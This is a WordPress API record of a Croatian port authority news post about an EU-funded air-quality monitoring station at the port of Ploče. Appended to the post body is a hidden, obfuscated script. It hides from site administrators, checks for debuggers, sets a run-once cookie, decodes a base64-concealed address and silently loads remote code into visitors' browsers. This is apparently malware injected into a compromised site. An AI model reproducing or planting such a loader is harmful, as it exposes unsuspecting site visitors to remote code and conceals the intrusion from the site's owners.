{"id":18321,"date":"2026-04-27T08:04:00","date_gmt":"2026-04-27T08:04:00","guid":{"rendered":"https:\/\/www.ppa.hr\/old\/?p=18321"},"modified":"2026-04-27T08:04:00","modified_gmt":"2026-04-27T08:04:00","slug":"lucka-uprava-ploce-postavlja-stanicu-za-mjerenje-kvalitete-zraka-na-luckom-podrucju-2","status":"publish","type":"post","link":"https:\/\/www.ppa.hr\/hr\/lucka-uprava-ploce-postavlja-stanicu-za-mjerenje-kvalitete-zraka-na-luckom-podrucju-2\/?lang=en","title":{"rendered":"Lu\u010dka uprava Plo\u010de postavlja  stanicu za mjerenje kvalitete zraka na lu\u010dkom podru\u010dju"},"content":{"rendered":"<p>[et_pb_section fb_built=&#8221;1&#8243; theme_builder_area=&#8221;post_content&#8221; _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221;][et_pb_row _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221;][et_pb_column _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; type=&#8221;4_4&#8243; theme_builder_area=&#8221;post_content&#8221;][et_pb_image _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221; title_text=&#8221;Lokacija mjerene postaje&#8221; src=&#8221;https:\/\/www.ppa.hr\/hr\/wp-content\/uploads\/2025\/02\/Lokacija-mjerene-postaje.jpg&#8221; hover_enabled=&#8221;0&#8243; sticky_enabled=&#8221;0&#8243;][\/et_pb_image][et_pb_text _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221; hover_enabled=&#8221;0&#8243; sticky_enabled=&#8221;0&#8243;][\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221;][et_pb_column _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; type=&#8221;4_4&#8243; theme_builder_area=&#8221;post_content&#8221;][et_pb_image _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221; title_text=&#8221;Lucka_uprava_Ploce_18&#8243; src=&#8221;https:\/\/www.ppa.hr\/hr\/wp-content\/uploads\/2025\/02\/Lucka_uprava_Ploce_18.jpg&#8221; hover_enabled=&#8221;0&#8243; sticky_enabled=&#8221;0&#8243;][\/et_pb_image][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221;][et_pb_column _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; type=&#8221;4_4&#8243; theme_builder_area=&#8221;post_content&#8221;][et_pb_text _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221; hover_enabled=&#8221;0&#8243; sticky_enabled=&#8221;0&#8243;]<\/p>\n<p>Mjerna postaja za mjerenje kvalitete zraka je jo\u0161 jedan u nizu projekata Lu\u010dke uprave Plo\u010de koji je usmjeren prema odr\u017eivom razvoju luke Plo\u010de.<\/p>\n<p>Danas je uru\u010dena Odluka o financiranju \u010dime je ovaj projekt ostvario bespovratno EU sufinanciranje u iznosu od 85% u sklopu Poziva koji je objavilo Ministarstvo za\u0161tite okoli\u0161a i zelene tranzicije<strong><em>.<\/em><\/strong><\/p>\n<p>Sam projekt, vrijedan 465.511,10 eura, odnosi se na ulaganje u uspostavu sustava za pra\u0107enje kvalitete zraka na reprezentativnoj lokaciji unutar lu\u010dkog podru\u010dja. To \u0107e omogu\u0107iti pravovremeno reagiranje u slu\u010daju pojave one\u010di\u0161\u0107enja zraka.<\/p>\n<p>&nbsp;<\/p>\n<p>Mjerna stanica \u0107e se nalaziti na granici lu\u010dkog podru\u010dja na sjevernoj strani, u neposrednoj blizini trajektnog pristani\u0161ta, \u0161to \u0107e omogu\u0107iti pra\u0107enje maksimalnog kratkotrajnog one\u010di\u0161\u0107enja zraka pod utjecajem lu\u010dkih emisija.<\/p>\n<p>&nbsp;<\/p>\n<p>Po zavr\u0161etku natje\u010dajnih postupaka i instalaciji mjerne stanice, lu\u010dko podru\u010dje biti \u0107e opremljeno suvremenim automatiziranim sustavima za mjerenje kvalitete zraka, uklju\u010duju\u0107i parametre poput brzine i smjera vjetra, temperature i vlage zraka. Svi prikupljeni podaci o kvaliteti zraka \u0107e biti javno dostupni 0-24 te \u0107e se nalaziti na web stranici nadle\u017enog Ministarstva te na stranicama Lu\u010dke uprave Plo\u010de.<\/p>\n<p>&nbsp;<\/p>\n<p>U kona\u010dnici, ovaj sustav omogu\u0107it \u0107e kontinuirani nadzor i pra\u0107enje kvalitete zraka \u0161to \u0107e pru\u017eiti pouzdanu osnovu za dono\u0161enje mjera za smanjenje emisija i za\u0161titu okoli\u0161a.<\/p>\n<p>&nbsp;<\/p>\n<p>Ovaj projekt je svojevrsni nastavak ulaganja u odr\u017eivost i u\u010dinkovito upravljanje za\u0161titom okoli\u0161a na podru\u010dju luke Plo\u010de. U posljednjih nekoliko godina pokrenut je cijeli niz projekata, od postavljanja solarne elektrane, instalacije energetski u\u010dinkovite rasvjete, plana uspostave ekolo\u0161ki odr\u017eivog napajanja teretnih brodova na vezu, digitalizacije lu\u010dkih procesa i brojnih drugih. Dugoro\u010dni cilj je stvaranje preduvjeta za transformaciju luke iz pretovarne luke u regionalni logisti\u010dki centar \u010dime bi se stvorili uvjeti odr\u017eivog sustava lu\u010dkog upravljanja na korist cijele zajednice.<\/p>\n<p>[\/et_pb_text][et_pb_image _builder_version=&#8221;4.22.2&#8243; _module_preset=&#8221;default&#8221; theme_builder_area=&#8221;post_content&#8221; title_text=&#8221;Lucka_uprava_Ploce_18&#8243; src=&#8221;https:\/\/www.ppa.hr\/hr\/wp-content\/uploads\/2025\/02\/Lucka_uprava_Ploce_18.jpg&#8221; hover_enabled=&#8221;0&#8243; sticky_enabled=&#8221;0&#8243;][\/et_pb_image][\/et_pb_column][\/et_pb_row][\/et_pb_section]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mjerna postaja za mjerenje kvalitete zraka je jo\u0161 jedan u nizu projekata Lu\u010dke uprave Plo\u010de koji je usmjeren prema odr\u017eivom razvoju luke Plo\u010de. Danas je uru\u010dena Odluka o financiranju \u010dime je ovaj projekt ostvario bespovratno EU sufinanciranje u iznosu od 85% u sklopu Poziva koji je objavilo Ministarstvo za\u0161tite okoli\u0161a i zelene tranzicije. Sam projekt, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":18325,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[93],"tags":[],"class_list":["post-18321","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-novosti"],"_links":{"self":[{"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/posts\/18321","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/comments?post=18321"}],"version-history":[{"count":3,"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/posts\/18321\/revisions"}],"predecessor-version":[{"id":18693,"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/posts\/18321\/revisions\/18693"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/media\/18325"}],"wp:attachment":[{"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/media?parent=18321"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/categories?post=18321"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ppa.hr\/hr\/wp-json\/wp\/v2\/tags?post=18321"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}